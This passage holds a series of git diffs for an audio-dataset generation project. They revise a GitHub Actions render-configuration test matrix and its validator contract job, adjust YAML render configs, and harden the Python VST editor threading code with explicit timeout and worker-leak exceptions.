+# would not fit under the 20-min step cap once multiplied by 8 cells).
 #
 # Validation of the produced shards is intentionally out of scope here:
 # ``needs.<job>.outputs.spec_uri`` from a matrix-strategy reusable workflow
@@ -36,7 +33,7 @@ name: Test Dataset Generation (Render-Config Matrix)
 #
 # Required secrets (forwarded via ``secrets: inherit``):
 #   RCLONE_CONFIG_R2_ACCESS_KEY_ID, RCLONE_CONFIG_R2_SECRET_ACCESS_KEY,
-#   RCLONE_CONFIG_R2_ENDPOINT, R2_ACCOUNT_ID — every row (R2 upload).
+#   RCLONE_CONFIG_R2_ENDPOINT, R2_ACCOUNT_ID — every cell (R2 upload).
 
 on:
   workflow_dispatch:
@@ -67,27 +64,23 @@ concurrency:
 
 jobs:
   generate:
-    name: Generate (${{ matrix.dataset_config }} / ${{ matrix.output_format }})
+    name: Generate (smoke-shard / cadence=${{ matrix.cadence }} / ${{ matrix.output_format }})
     strategy:
-      # One broken config must not mask others — every cell still emits its
+      # One broken cell must not mask others — every cell still emits its
       # own pass/fail signal even if a sibling cell aborts.
       fail-fast: false
       matrix:
-        include:
-          - dataset_config: generate_dataset/smoke-shard
-            output_format: hdf5
-          - dataset_config: generate_dataset/smoke-shard-wds
-            output_format: wds
-          - dataset_config: generate_dataset/nightly-parallel-smoke
-            output_format: hdf5
+        cadence: [never, once, render, always_on]
+        output_format: [hdf5, wds]
     uses: ./.github/workflows/generate-dataset-shards.yaml
     with:
       provider: skypilot-local
-      dataset_config: ${{ matrix.dataset_config }}
+      dataset_config: generate_dataset/smoke-shard
       image_tag: ${{ inputs.docker_image_tag || 'dev-snapshot' }}
       cluster_name: synth-setter-render-matrix-${{ strategy.job-index }}-${{ github.run_id }}-${{ github.run_attempt }}
       num_workers: "1"
       tail: true
       local: true
-      artifact_name: render-matrix-run-metadata-${{ matrix.output_format }}-${{ strategy.job-index }}
+      artifact_name: render-matrix-run-metadata-${{ matrix.cadence }}-${{ matrix.output_format }}-${{ strategy.job-index }}
+      hydra_overrides: render.gui_toggle_cadence=${{ matrix.cadence }} output_format=${{ matrix.output_format }}
     secrets: inherit

--- a/.github/workflows/test-dataset-generation-render-matrix.yml
+++ b/.github/workflows/test-dataset-generation-render-matrix.yml
@@ -12,12 +12,16 @@ name: Test Dataset Generation (Render-Config Matrix)
 #
 # Matrix axes:
 #   * dataset_config — every PR-sized experiment under
-#     ``configs/experiment/generate_dataset/``. ``ci-materialize-test`` and
-#     ``ci-materialize-test-wds`` (96 samples) are intentionally included to
-#     cover the larger-volume cadence path; ``nightly-parallel-smoke`` covers
-#     ``RenderConfig.parallel=true``. The 480k-sample ``surge-simple`` and
-#     ``10-1k-shards`` configs are excluded — they belong on the paid
-#     weekly schedule, not the PR matrix.
+#     ``configs/experiment/generate_dataset/`` that exercises a distinct
+#     render-side code path. ``nightly-parallel-smoke`` covers
+#     ``RenderConfig.parallel=true``. The ``ci-materialize-test`` configs
+#     are excluded — they exist for spec-materialization round-trip, not
+#     for render-code coverage (the wds writer is exercised by
+#     ``smoke-shard-wds`` already, and the 96-sample hdf5 cadence does not
+#     add render-side signal beyond what the smoke configs already cover).
+#     The 480k-sample ``surge-simple`` and ``10-1k-shards`` configs are
+#     also excluded — they belong on the paid weekly schedule, not the
+#     PR matrix.
 #   * output_format — pinned per config (the spec-format cross-check would
 #     deterministically fail a mismatched cell, so the matrix is shaped
 #     per-config rather than fanned 2x).
@@ -73,10 +77,6 @@ jobs:
           - dataset_config: generate_dataset/smoke-shard
             output_format: hdf5
           - dataset_config: generate_dataset/smoke-shard-wds
-            output_format: wds
-          - dataset_config: generate_dataset/ci-materialize-test
-            output_format: hdf5
-          - dataset_config: generate_dataset/ci-materialize-test-wds
             output_format: wds
           - dataset_config: generate_dataset/nightly-parallel-smoke
             output_format: hdf5

--- a/.github/workflows/test-dataset-generation-render-matrix.yml
+++ b/.github/workflows/test-dataset-generation-render-matrix.yml
@@ -1,71 +1,50 @@
 name: Test Dataset Generation (Render-Config Matrix)
 
-# Per-PR matrix exercise of ``test-dataset-generation`` across the render-side
-# code paths a PR can regress. The base config is ``smoke-shard`` (the only
-# experiment whose 12-sample volume fits comfortably under the reusable's
-# step cap); cells fan out across ``render.gui_toggle_cadence`` and
-# ``output_format``. The matrix exercises ``run_with_editor_held_open``
-# (main thread blocks in ``show_editor``, render worker runs the loop)
-# under each ``gui_toggle_cadence`` and ``output_format`` combination, so
-# a regression in either the thread inversion (#1204) or the cadence
-# dispatch (#1187) surfaces at PR time instead of waiting for the
-# nightly cron.
+# Per-PR matrix exercise of ``test-dataset-generation`` across the
+# ``RenderConfig`` cross-field validator surface. The base config is
+# ``smoke-shard`` (the only experiment whose 12-sample volume fits under the
+# reusable's step cap); cells fan out across the two cadence fields the
+# validator pairs — ``render.gui_toggle_cadence`` and
+# ``render.plugin_reload_cadence``. A regression in either the thread
+# inversion (#1204), the cadence dispatch (#1187), or the validator itself
+# (``src/synth_setter/pipeline/schemas/spec.py::RenderConfig
+# ._always_on_requires_plugin_reload_once``) surfaces at PR time instead of
+# waiting for the nightly cron.
 #
 # Two jobs cover complementary contracts:
 #
-#   * ``generate`` — positive matrix. 6 cells (``never`` / ``once`` /
-#     ``render``) x (``hdf5`` / ``wds``) running through the
-#     ``generate-dataset-shards.yaml`` reusable workflow. ``always_on`` is
-#     intentionally NOT in this matrix: combining it with the schema's
-#     default ``plugin_reload_cadence="render"`` is a configuration error
-#     that the ``RenderConfig._always_on_requires_plugin_reload_once``
-#     validator rejects at spec construction (``src/synth_setter/pipeline/
-#     schemas/spec.py``). Per-cell ``hydra_overrides`` could opt in to
-#     ``always_on`` + ``plugin_reload_cadence=once`` here, but the
-#     end-to-end ``always_on`` render path is already covered by
-#     ``test_always_on_renders_small_shard_end_to_end`` in
-#     ``test-vst-slow.yml`` against a real Surge XT plugin.
+#   * ``generate`` — positive matrix. 7 cells = 4 ``gui_toggle_cadence``
+#     values x 2 ``plugin_reload_cadence`` values minus the single
+#     ``always_on`` + ``render`` rejection cell. Each cell runs through the
+#     ``generate-dataset-shards.yaml`` reusable workflow and exercises the
+#     inline ``validate_all_shards_from_r2`` step (#1224). The legitimate
+#     ``always_on`` path (``always_on`` + ``once``) is in the matrix.
 #
-#   * ``validator_rejects_always_on`` — contract job. 2 inline cells
-#     (``always_on``) x (``hdf5`` / ``wds``) invoking
-#     ``synth-setter-generate-dataset`` directly with ``continue-on-error``
-#     and asserting both that the CLI exited non-zero AND that the
-#     ``_always_on_requires_plugin_reload_once`` validator message was
-#     surfaced. The cells run inline (no docker / no kind) because the
-#     validator fires during ``spec_from_cfg`` before any side effect, so a
-#     plain python install is sufficient and far cheaper than the reusable
-#     workflow's compute setup. The reusable workflow can't host this
-#     contract directly because step-level ``continue-on-error`` doesn't
-#     compose into a reusable-workflow caller and the matrix needs to
-#     observe per-cell failure.
+#   * ``validator_rejects_always_on_render`` — contract job. Single inline
+#     cell invoking ``synth-setter-generate-dataset`` directly with
+#     ``continue-on-error`` and asserting both that the CLI exited non-zero
+#     AND that the ``_always_on_requires_plugin_reload_once`` validator
+#     message was surfaced. The cell runs inline (no docker / no kind)
+#     because the validator fires during ``spec_from_cfg`` before any side
+#     effect, so a plain python install is sufficient and far cheaper than
+#     the reusable workflow's compute setup. The reusable workflow can't
+#     host this contract directly because step-level ``continue-on-error``
+#     doesn't compose into a reusable-workflow caller.
 #
-# Matrix axes for the positive ``generate`` job (6 cells = 3 x 2, all
-# fan-out in parallel):
-#   * cadence — three of the four ``_GuiToggleCadence`` Literal values in
-#     ``src/synth_setter/pipeline/schemas/spec.py``. ``never`` / ``once`` /
-#     ``render`` keep the warm-up paths under PR-time coverage;
-#     ``always_on`` lives in the contract job above.
-#   * output_format — ``hdf5`` and ``wds``. Injected via the reusable's
-#     ``hydra_overrides`` input rather than a sibling experiment file so
-#     the matrix stays a single ``smoke-shard`` base.
+# ``output_format`` is fixed at ``hdf5`` for every cell — it's the
+# more-mature finalize path (#1202) and the inline shard-validate step
+# (#1224) exercises the format the same way regardless. Re-adding
+# ``output_format`` as a matrix axis is tracked in #1226.
 #
 # ``RenderConfig.parallel`` (#1189) coverage stays on the existing weekly
 # cron in ``test-dataset-generation.yml`` (the nightly-parallel-smoke config
 # would not fit under the 40-min step cap once multiplied by the cells).
 #
-# Validation of the produced shards is intentionally out of scope here:
-# ``needs.<job>.outputs.spec_uri`` from a matrix-strategy reusable workflow
-# call collapses to one cell's value, so a fan-out validate would silently
-# point every cell at the same spec. Generate-side success across the
-# matrix is the load-bearing signal for the regressions this workflow
-# guards; shard validation stays on ``test-dataset-generation.yml`` (which
-# runs ``smoke-shard`` only and so does not hit the collapse).
-#
 # Required secrets (forwarded via ``secrets: inherit``):
 #   RCLONE_CONFIG_R2_ACCESS_KEY_ID, RCLONE_CONFIG_R2_SECRET_ACCESS_KEY,
 #   RCLONE_CONFIG_R2_ENDPOINT, R2_ACCOUNT_ID — positive ``generate`` cells
-#   (R2 upload). The contract job needs no secrets — it fails before
-#   ``ensure_r2_env_loaded`` is called.
+#   (R2 upload + shard validate). The contract job needs no secrets — it
+#   fails before ``ensure_r2_env_loaded`` is called.
 
 on:
   workflow_dispatch:
@@ -96,14 +75,19 @@ concurrency:
 
 jobs:
   generate:
-    name: Generate (smoke-shard / cadence=${{ matrix.cadence }} / ${{ matrix.output_format }})
+    name: Generate (smoke-shard / gui=${{ matrix.gui_toggle_cadence }} / reload=${{ matrix.plugin_reload_cadence }})
     strategy:
       # One broken cell must not mask others — every cell still emits its
       # own pass/fail signal even if a sibling cell aborts.
       fail-fast: false
       matrix:
-        cadence: [never, once, render]
-        output_format: [hdf5, wds]
+        gui_toggle_cadence: [never, once, render, always_on]
+        plugin_reload_cadence: [once, render]
+        # ``always_on`` + ``render`` is the validator's rejection contract;
+        # it lives in ``validator_rejects_always_on_render`` below.
+        exclude:
+          - gui_toggle_cadence: always_on
+            plugin_reload_cadence: render
     uses: ./.github/workflows/generate-dataset-shards.yaml
     with:
       provider: skypilot-local
@@ -113,25 +97,21 @@ jobs:
       num_workers: "1"
       tail: true
       local: true
-      artifact_name: render-matrix-run-metadata-${{ matrix.cadence }}-${{ matrix.output_format }}-${{ strategy.job-index }}
-      hydra_overrides: render.gui_toggle_cadence=${{ matrix.cadence }} output_format=${{ matrix.output_format }}
+      artifact_name: render-matrix-run-metadata-${{ matrix.gui_toggle_cadence }}-${{ matrix.plugin_reload_cadence }}-${{ strategy.job-index }}
+      hydra_overrides: render.gui_toggle_cadence=${{ matrix.gui_toggle_cadence }} render.plugin_reload_cadence=${{ matrix.plugin_reload_cadence }} output_format=hdf5
     secrets: inherit
 
   # Contract job — asserts ``RenderConfig._always_on_requires_plugin_reload_once``
-  # rejects ``gui_toggle_cadence="always_on"`` combined with the schema's
-  # default ``plugin_reload_cadence="render"``. The reusable workflow can't
-  # host this (step-level ``continue-on-error`` doesn't compose into a
-  # reusable-workflow caller, and the matrix needs to observe per-cell
-  # failure), so the CLI runs inline. The validator fires inside
-  # ``spec_from_cfg`` before ``ensure_r2_env_loaded``, so no cloud creds or
-  # docker image are required.
-  validator_rejects_always_on:
-    name: Validator rejects always_on (cadence=always_on / ${{ matrix.output_format }})
+  # rejects ``gui_toggle_cadence="always_on"`` combined with
+  # ``plugin_reload_cadence="render"`` (the only ``non-once`` value, also the
+  # schema default). The reusable workflow can't host this (step-level
+  # ``continue-on-error`` doesn't compose into a reusable-workflow caller),
+  # so the CLI runs inline. The validator fires inside ``spec_from_cfg``
+  # before ``ensure_r2_env_loaded``, so no cloud creds or docker image are
+  # required.
+  validator_rejects_always_on_render:
+    name: Validator rejects always_on + render
     runs-on: ubuntu-latest
-    strategy:
-      fail-fast: false
-      matrix:
-        output_format: [hdf5, wds]
     timeout-minutes: 10
     steps:
       - name: Checkout
@@ -155,10 +135,10 @@ jobs:
       - name: Install package (validator only)
         run: uv pip install --system -e .
 
-      # ``continue-on-error`` keeps the matrix cell green so the next step
-      # can assert the failure. ``PIPESTATUS[0]`` captures the launcher
-      # exit (the ``| tee`` tail returns 0 even when the launcher raises).
-      - name: Run generate-dataset (must fail for always_on + default reload cadence)
+      # ``continue-on-error`` keeps the cell green so the next step can
+      # assert the failure. ``PIPESTATUS[0]`` captures the launcher exit
+      # (the ``| tee`` tail returns 0 even when the launcher raises).
+      - name: Run generate-dataset (must fail for always_on + render)
         id: cli
         continue-on-error: true
         env:
@@ -168,7 +148,8 @@ jobs:
           synth-setter-generate-dataset \
             experiment=generate_dataset/smoke-shard \
             render.gui_toggle_cadence=always_on \
-            output_format=${{ matrix.output_format }} \
+            render.plugin_reload_cadence=render \
+            output_format=hdf5 \
             2>&1 | tee cli.log
           echo "cli_exit=${PIPESTATUS[0]}" >> "${GITHUB_OUTPUT}"
 
@@ -178,7 +159,7 @@ jobs:
         run: |
           set -euo pipefail
           if [[ "${CLI_EXIT}" == "0" ]]; then
-            echo "::error::expected synth-setter-generate-dataset to exit non-zero on gui_toggle_cadence=always_on with default plugin_reload_cadence (=render); got exit 0. The _always_on_requires_plugin_reload_once validator did not fire."
+            echo "::error::expected synth-setter-generate-dataset to exit non-zero on gui_toggle_cadence=always_on with plugin_reload_cadence=render; got exit 0. The _always_on_requires_plugin_reload_once validator did not fire."
             exit 1
           fi
           if ! grep -q 'gui_toggle_cadence="always_on" requires plugin_reload_cadence="once"' cli.log; then

--- a/configs/experiment/generate_dataset/smoke-shard.yaml
+++ b/configs/experiment/generate_dataset/smoke-shard.yaml
@@ -18,3 +18,7 @@ render:
   min_loudness: -50.0
   samples_per_render_batch: 4
   samples_per_shard: 4
+  # Materialized so the render-matrix workflow can resolve
+  # `render.gui_toggle_cadence=<cell>` overrides against this experiment
+  # without flipping the platform-aware default in `configs/render/surge_xt.yaml`.
+  gui_toggle_cadence: never

--- a/configs/experiment/generate_dataset/smoke-shard.yaml
+++ b/configs/experiment/generate_dataset/smoke-shard.yaml
@@ -22,7 +22,3 @@ render:
   # `render.gui_toggle_cadence=<cell>` overrides against this experiment
   # without flipping the platform-aware default in `configs/render/surge_xt.yaml`.
   gui_toggle_cadence: never
-  # Pinned to `once` so the matrix's `always_on` cells satisfy the
-  # `_always_on_requires_plugin_reload_once` cross-field validator in
-  # `RenderConfig`; the other cells accept `once` and stay valid.
-  plugin_reload_cadence: once

--- a/configs/experiment/generate_dataset/smoke-shard.yaml
+++ b/configs/experiment/generate_dataset/smoke-shard.yaml
@@ -22,3 +22,7 @@ render:
   # `render.gui_toggle_cadence=<cell>` overrides against this experiment
   # without flipping the platform-aware default in `configs/render/surge_xt.yaml`.
   gui_toggle_cadence: never
+  # Pinned to `once` so the matrix's `always_on` cells satisfy the
+  # `_always_on_requires_plugin_reload_once` cross-field validator in
+  # `RenderConfig`; the other cells accept `once` and stay valid.
+  plugin_reload_cadence: once

--- a/configs/experiment/generate_dataset/smoke-shard.yaml
+++ b/configs/experiment/generate_dataset/smoke-shard.yaml
@@ -19,6 +19,10 @@ render:
   samples_per_render_batch: 4
   samples_per_shard: 4
   # Materialized so the render-matrix workflow can resolve
-  # `render.gui_toggle_cadence=<cell>` overrides against this experiment
-  # without flipping the platform-aware default in `configs/render/surge_xt.yaml`.
+  # `render.gui_toggle_cadence=<cell>` / `render.plugin_reload_cadence=<cell>`
+  # overrides against this experiment without flipping the platform-aware
+  # default in `configs/render/surge_xt.yaml`. The base values match the
+  # Pydantic schema defaults — overrides flow through the cross-field
+  # validator (`RenderConfig._always_on_requires_plugin_reload_once`).
   gui_toggle_cadence: never
+  plugin_reload_cadence: render

--- a/configs/render/surge_xt.yaml
+++ b/configs/render/surge_xt.yaml
@@ -8,4 +8,3 @@ velocity: 100
 signal_duration_seconds: 4.0
 min_loudness: -50.0
 samples_per_shard: 10000
-gui_toggle_cadence: never

--- a/configs/render/surge_xt.yaml
+++ b/configs/render/surge_xt.yaml
@@ -8,3 +8,4 @@ velocity: 100
 signal_duration_seconds: 4.0
 min_loudness: -50.0
 samples_per_shard: 10000
+gui_toggle_cadence: never

--- a/src/synth_setter/data/vst/core.py
+++ b/src/synth_setter/data/vst/core.py
@@ -18,8 +18,18 @@ _EDITOR_INIT_DELAY_SECONDS = 0.5
 # drain after the close event is set; a generous safety net for the held-open
 # path (#1187), not a normal-case timing parameter.
 _EDITOR_JOIN_TIMEOUT_SECONDS = 2.0
-# Upper bound on the editor-thread start handshake; slow-start warns and proceeds (#1198).
+# Upper bound on the editor-thread start handshake; a miss raises
+# ``EditorStartTimeout`` rather than proceeding silently (#1198, #1204).
 _EDITOR_START_TIMEOUT_SECONDS = 5.0
+
+
+class EditorStartTimeout(RuntimeError):
+    """Raised when the ``editor_held_open`` start handshake misses its deadline.
+
+    Surfaces a slow editor-thread bring-up as a loud failure so the render aborts and the trace is
+    attributable, rather than degrading to a warning that would be lost in normal log noise
+    (#1204).
+    """
 
 
 def extract_renderer_version(plugin_path: Path) -> str:
@@ -108,12 +118,16 @@ def editor_held_open(plugin: VST3Plugin) -> Iterator[None]:
     left to be reaped at process exit; a warning records the leak.
 
     Before yielding, blocks on a start handshake bounded by
-    ``_EDITOR_START_TIMEOUT_SECONDS`` (#1198). The event proves the editor
-    thread reached the line just before ``show_editor`` without the host
-    raising, not that ``show_editor`` has realised the window — pedalboard
-    exposes no editor-ready signal.
+    ``_EDITOR_START_TIMEOUT_SECONDS`` (#1198). A miss raises
+    ``EditorStartTimeout`` — the body never runs, so a stuck editor bring-up
+    fails loud and traceable rather than masquerading as a slow render
+    (#1204). The event proves the editor thread reached the line just before
+    ``show_editor`` without the host raising, not that ``show_editor`` has
+    realised the window — pedalboard exposes no editor-ready signal.
 
     :param plugin: A loaded VST3 plugin whose editor is realised for the block.
+    :raises EditorStartTimeout: ``editor_started`` did not fire within
+        ``_EDITOR_START_TIMEOUT_SECONDS``; the ``with`` body is skipped.
     :raises Exception: Propagated from the editor thread at ``__exit__`` only
         when the ``with`` body itself raised nothing — typically a
         ``RuntimeError`` from the VST3 host.
@@ -133,10 +147,9 @@ def editor_held_open(plugin: VST3Plugin) -> Iterator[None]:
     editor_thread = threading.Thread(target=_run_editor, daemon=True, name="vst-editor-window")
     editor_thread.start()
     if not editor_started.wait(timeout=_EDITOR_START_TIMEOUT_SECONDS):
-        logger.warning(
-            "vst-editor-window did not signal start within {}s; "
-            "proceeding without start handshake",
-            _EDITOR_START_TIMEOUT_SECONDS,
+        close_editor.set()  # release any later show_editor call so the daemon can drain
+        raise EditorStartTimeout(
+            f"vst-editor-window did not signal start within {_EDITOR_START_TIMEOUT_SECONDS}s"
         )
     try:
         yield

--- a/src/synth_setter/data/vst/core.py
+++ b/src/synth_setter/data/vst/core.py
@@ -18,9 +18,7 @@ _EDITOR_INIT_DELAY_SECONDS = 0.5
 # drain after the close event is set; a generous safety net for the held-open
 # path (#1187), not a normal-case timing parameter.
 _EDITOR_JOIN_TIMEOUT_SECONDS = 2.0
-# Upper bound on how long ``editor_held_open`` waits for the editor thread to
-# signal it has been scheduled past the entry point before yielding to the
-# body (#1198); a slow-start miss warns and proceeds rather than raises.
+# Upper bound on the editor-thread start handshake; slow-start warns and proceeds (#1198).
 _EDITOR_START_TIMEOUT_SECONDS = 5.0
 
 
@@ -110,10 +108,10 @@ def editor_held_open(plugin: VST3Plugin) -> Iterator[None]:
     left to be reaped at process exit; a warning records the leak.
 
     Before yielding, blocks on a start handshake bounded by
-    ``_EDITOR_START_TIMEOUT_SECONDS`` (#1198). The event only proves the
-    editor thread was scheduled past the entry point, not that
-    ``show_editor`` has realised the window — pedalboard exposes no
-    editor-ready signal.
+    ``_EDITOR_START_TIMEOUT_SECONDS`` (#1198). The event proves the editor
+    thread reached the line just before ``show_editor`` without the host
+    raising, not that ``show_editor`` has realised the window — pedalboard
+    exposes no editor-ready signal.
 
     :param plugin: A loaded VST3 plugin whose editor is realised for the block.
     :raises Exception: Propagated from the editor thread at ``__exit__`` only
@@ -125,8 +123,8 @@ def editor_held_open(plugin: VST3Plugin) -> Iterator[None]:
     captured: list[Exception] = []
 
     def _run_editor() -> None:
-        editor_started.set()
         try:
+            editor_started.set()
             plugin.show_editor(close_editor)
         except Exception as exc:  # noqa: BLE001 — fan-in for any host-side failure
             logger.exception("vst-editor-window crashed: {}", exc)

--- a/src/synth_setter/data/vst/core.py
+++ b/src/synth_setter/data/vst/core.py
@@ -13,12 +13,25 @@ from pedalboard.io import AudioFile
 
 # How long the editor stays open before we signal it to close.
 _EDITOR_INIT_DELAY_SECONDS = 0.5
-# Upper bound on how long ``run_with_editor_held_open`` waits for the render
-# worker to drain after ``show_editor`` returns; a generous safety net for the
-# held-open path (#1187), not a normal-case timing parameter.
+# Hard ceiling on how long ``run_with_editor_held_open`` waits for the render
+# worker to drain after ``show_editor`` returns; exceeding it raises
+# ``RenderWorkerLeaked`` (#1204) so the helper never returns with a live
+# worker thread.
 _EDITOR_JOIN_TIMEOUT_SECONDS = 2.0
 
 _BodyResult = TypeVar("_BodyResult")
+
+
+class RenderWorkerLeaked(RuntimeError):
+    """Render worker outlived the join window — body never reached a terminal state.
+
+    Raised by ``run_with_editor_held_open`` when ``show_editor`` returns but the
+    worker thread is still alive past ``_EDITOR_JOIN_TIMEOUT_SECONDS``, or when
+    the worker exited without capturing a result or exception. Either branch
+    means the helper cannot honour its "returns whatever body() returned"
+    contract; surfacing it as an exception keeps the caller from treating an
+    in-flight or empty render as success (#1204).
+    """
 
 
 def extract_renderer_version(plugin_path: Path) -> str:
@@ -96,11 +109,13 @@ def run_with_editor_held_open(plugin: VST3Plugin, body: Callable[[], _BodyResult
     """Invoke ``body()`` on a worker thread while the caller blocks in ``plugin.show_editor``.
 
     Pedalboard 0.9.x requires ``show_editor`` to run on the process main
-    thread; the worker handles renders so the editor stays realised for the
-    duration of ``body()`` (#1187). Worker exceptions propagate to the caller
-    after ``show_editor`` returns. If the worker outlives the
-    ``_EDITOR_JOIN_TIMEOUT_SECONDS`` join window after the close event is set,
-    a warning records the leak.
+    thread; a daemon worker handles renders so the editor stays realised for
+    the duration of ``body()`` (#1187). Worker exceptions propagate to the
+    caller after ``show_editor`` returns and take precedence over the leak
+    signal so a body that raised while finishing slowly still surfaces its
+    own exception. The helper never returns with a live worker thread:
+    ``BodyResult`` is delivered only when the worker reached a terminal state
+    inside the join window; any other outcome raises ``RenderWorkerLeaked``.
 
     :param plugin: A loaded VST3 plugin whose editor is realised for the call.
     :param body: Callable executed on the worker thread; its return value is
@@ -109,6 +124,9 @@ def run_with_editor_held_open(plugin: VST3Plugin, body: Callable[[], _BodyResult
     :raises BaseException: Re-raised from the worker thread if ``body()``
         raised — typically a ``RuntimeError`` from the VST3 host or a render
         failure.
+    :raises RenderWorkerLeaked: Worker outlived ``_EDITOR_JOIN_TIMEOUT_SECONDS``
+        after the close event was set, or exited without producing a result
+        or exception (no body return value can be surfaced safely).
     """
     close_editor = threading.Event()
     result: list[_BodyResult] = []
@@ -122,25 +140,31 @@ def run_with_editor_held_open(plugin: VST3Plugin, body: Callable[[], _BodyResult
         finally:
             close_editor.set()
 
-    worker = threading.Thread(target=_worker, name="render-worker")
+    worker = threading.Thread(target=_worker, name="render-worker", daemon=True)
     worker.start()
     try:
         plugin.show_editor(close_editor)
     finally:
         close_editor.set()
         worker.join(timeout=_EDITOR_JOIN_TIMEOUT_SECONDS)
-        if worker.is_alive():
-            logger.warning(
-                "render-worker did not drain within {}s; thread leaks (reaped at process exit)",
-                _EDITOR_JOIN_TIMEOUT_SECONDS,
-            )
     if captured:
         exc: BaseException = captured[0]
         raise exc
+    if worker.is_alive():
+        logger.warning(
+            "render-worker did not drain within {}s — raising RenderWorkerLeaked"
+            " (the body must complete or raise before show_editor returns)",
+            _EDITOR_JOIN_TIMEOUT_SECONDS,
+        )
+        raise RenderWorkerLeaked(
+            f"render-worker still alive after {_EDITOR_JOIN_TIMEOUT_SECONDS}s join window;"
+            " body did not complete or raise before show_editor returned"
+        )
     if not result:
-        # Worker outlived the join window without completing — the leak warning above
-        # records this; there's no body return value to surface.
-        return None  # type: ignore[return-value]
+        raise RenderWorkerLeaked(
+            "render-worker exited without producing a result or exception;"
+            " body() must either return or raise"
+        )
     return result[0]
 
 

--- a/src/synth_setter/data/vst/core.py
+++ b/src/synth_setter/data/vst/core.py
@@ -127,7 +127,10 @@ def editor_held_open(plugin: VST3Plugin) -> Iterator[None]:
 
     :param plugin: A loaded VST3 plugin whose editor is realised for the block.
     :raises EditorStartTimeout: ``editor_started`` did not fire within
-        ``_EDITOR_START_TIMEOUT_SECONDS``; the ``with`` body is skipped.
+        ``_EDITOR_START_TIMEOUT_SECONDS``; the ``with`` body is skipped and
+        the editor thread is joined under the same bounded teardown as the
+        success path so a late-starting daemon cannot leak past the failed
+        context-entry.
     :raises Exception: Propagated from the editor thread at ``__exit__`` only
         when the ``with`` body itself raised nothing — typically a
         ``RuntimeError`` from the VST3 host.
@@ -146,12 +149,11 @@ def editor_held_open(plugin: VST3Plugin) -> Iterator[None]:
 
     editor_thread = threading.Thread(target=_run_editor, daemon=True, name="vst-editor-window")
     editor_thread.start()
-    if not editor_started.wait(timeout=_EDITOR_START_TIMEOUT_SECONDS):
-        close_editor.set()  # release any later show_editor call so the daemon can drain
-        raise EditorStartTimeout(
-            f"vst-editor-window did not signal start within {_EDITOR_START_TIMEOUT_SECONDS}s"
-        )
     try:
+        if not editor_started.wait(timeout=_EDITOR_START_TIMEOUT_SECONDS):
+            raise EditorStartTimeout(
+                f"vst-editor-window did not signal start within {_EDITOR_START_TIMEOUT_SECONDS}s"
+            )
         yield
     finally:
         close_editor.set()

--- a/src/synth_setter/data/vst/core.py
+++ b/src/synth_setter/data/vst/core.py
@@ -1,10 +1,9 @@
-import contextlib
 import json
 import plistlib
-import sys
 import threading
-from collections.abc import Iterator
+from collections.abc import Callable
 from pathlib import Path
+from typing import TypeVar
 
 import mido
 import numpy as np
@@ -14,22 +13,12 @@ from pedalboard.io import AudioFile
 
 # How long the editor stays open before we signal it to close.
 _EDITOR_INIT_DELAY_SECONDS = 0.5
-# Upper bound on how long ``editor_held_open`` waits for the editor thread to
-# drain after the close event is set; a generous safety net for the held-open
-# path (#1187), not a normal-case timing parameter.
+# Upper bound on how long ``run_with_editor_held_open`` waits for the render
+# worker to drain after ``show_editor`` returns; a generous safety net for the
+# held-open path (#1187), not a normal-case timing parameter.
 _EDITOR_JOIN_TIMEOUT_SECONDS = 2.0
-# Upper bound on the editor-thread start handshake; a miss raises
-# ``EditorStartTimeout`` rather than proceeding silently (#1198, #1204).
-_EDITOR_START_TIMEOUT_SECONDS = 5.0
 
-
-class EditorStartTimeout(RuntimeError):
-    """Raised when the ``editor_held_open`` start handshake misses its deadline.
-
-    Surfaces a slow editor-thread bring-up as a loud failure so the render aborts and the trace is
-    attributable, rather than degrading to a warning that would be lost in normal log noise
-    (#1204).
-    """
+_BodyResult = TypeVar("_BodyResult")
 
 
 def extract_renderer_version(plugin_path: Path) -> str:
@@ -103,80 +92,56 @@ def warmup_plugin(plugin: VST3Plugin) -> None:
         close_editor.set()  # defensive: ensure show_editor unblocks even if Timer fails
 
 
-@contextlib.contextmanager
-def editor_held_open(plugin: VST3Plugin) -> Iterator[None]:
-    """Hold ``plugin.show_editor`` open on a background thread for the ``with`` body.
+def run_with_editor_held_open(plugin: VST3Plugin, body: Callable[[], _BodyResult]) -> _BodyResult:
+    """Invoke ``body()`` on a worker thread while the caller blocks in ``plugin.show_editor``.
 
-    The editor runs on a daemon thread blocking inside ``show_editor(close_event)``.
-    ``__exit__`` sets the event, joins the thread (bounded by
-    ``_EDITOR_JOIN_TIMEOUT_SECONDS``), and re-raises any exception the editor
-    thread raised — already logged at the moment of failure via
-    ``logger.exception``. **Body exceptions always win:** if the ``with`` body
-    raises, that exception propagates and a captured editor-thread exception
-    is logged but not re-raised (it would otherwise mask the original error in
-    the ``finally``-clause raise). If the join times out the daemon thread is
-    left to be reaped at process exit; a warning records the leak.
+    Pedalboard 0.9.x requires ``show_editor`` to run on the process main
+    thread; the worker handles renders so the editor stays realised for the
+    duration of ``body()`` (#1187). Worker exceptions propagate to the caller
+    after ``show_editor`` returns. If the worker outlives the
+    ``_EDITOR_JOIN_TIMEOUT_SECONDS`` join window after the close event is set,
+    a warning records the leak.
 
-    Before yielding, blocks on a start handshake bounded by
-    ``_EDITOR_START_TIMEOUT_SECONDS`` (#1198). A miss raises
-    ``EditorStartTimeout`` — the body never runs, so a stuck editor bring-up
-    fails loud and traceable rather than masquerading as a slow render
-    (#1204). The event proves the editor thread reached the line just before
-    ``show_editor`` without the host raising, not that ``show_editor`` has
-    realised the window — pedalboard exposes no editor-ready signal.
-
-    :param plugin: A loaded VST3 plugin whose editor is realised for the block.
-    :raises EditorStartTimeout: ``editor_started`` did not fire within
-        ``_EDITOR_START_TIMEOUT_SECONDS``; the ``with`` body is skipped and
-        the editor thread is joined under the same bounded teardown as the
-        success path so a late-starting daemon cannot leak past the failed
-        context-entry.
-    :raises Exception: Propagated from the editor thread at ``__exit__`` only
-        when the ``with`` body itself raised nothing — typically a
-        ``RuntimeError`` from the VST3 host.
+    :param plugin: A loaded VST3 plugin whose editor is realised for the call.
+    :param body: Callable executed on the worker thread; its return value is
+        returned to the caller.
+    :returns: Whatever ``body()`` returned.
+    :raises BaseException: Re-raised from the worker thread if ``body()``
+        raised — typically a ``RuntimeError`` from the VST3 host or a render
+        failure.
     """
     close_editor = threading.Event()
-    editor_started = threading.Event()
-    captured: list[Exception] = []
+    result: list[_BodyResult] = []
+    captured: list[BaseException] = []
 
-    def _run_editor() -> None:
+    def _worker() -> None:
         try:
-            editor_started.set()
-            plugin.show_editor(close_editor)
-        except Exception as exc:  # noqa: BLE001 — fan-in for any host-side failure
